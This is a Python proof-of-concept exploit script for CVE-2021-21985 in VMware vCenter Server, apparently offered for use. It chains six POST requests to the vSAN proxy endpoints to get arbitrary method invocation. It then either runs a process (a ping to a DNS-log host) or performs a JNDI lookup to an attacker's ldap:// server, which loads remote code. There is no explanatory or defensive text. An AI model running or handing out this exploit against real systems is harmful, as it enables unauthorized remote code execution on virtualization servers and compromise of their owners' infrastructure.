vCenter Server CVE-2021-21985 POC
import requests import json import sys #python CVE-2021-21985.py https://test.com/ xx.dnslog.cn 2 url = sys.argv[1] dns = sys.argv[2] exp = sys.argv[3] header = {'Content-Type':'application/json','User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'} cookie = {} requests.packages.urllib3.disable_warnings() def step1(url): urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVsanServiceFactory/setTargetObject' data = {"methodInput":[None]} r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False) if r.text == '{"result":null}': print('step1 success') step2(url,exp) else : print('step1 error') def step2(url,exp): urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod' data = {"methodInput":["java.lang.ProcessImpl.start"]} if exp == 1 else {"methodInput":["javax.naming.InitialContext.doLookup"]} r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False) if r.text == '{"result":null}': print('step2 success') step3(url,exp) else : print('step2 error') def step3(url,exp): urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod' data = {"methodInput":["start"]} if exp == 1 else {"methodInput":["doLookup"]} r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False) if r.text == '{"result":null}': print('step3 success') step4(url,dns,exp) else : print('step3 error') def step4(url,dns,exp): urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments' data = {"methodInput":[[["ping",dns],None,".",None,True]]} if exp == 1 else {"methodInput":[["ldap://"+dns+":1389/Exploit"]]} r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False) if r.text == '{"result":null}': print('step4 success') step5(url) else : print('step4 error') def step5(url): urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare' data = {"methodInput":[]} r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False) if r.text == '{"result":null}': print('step5 success') step6(url) else : print('step5 error') def step6(url): urls = url+'/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke' data = {"methodInput":[]} r = requests.post(url=urls,data=json.dumps(data),headers=header,cookies=cookie,verify=False,timeout=5) print('step6 success') step1(url)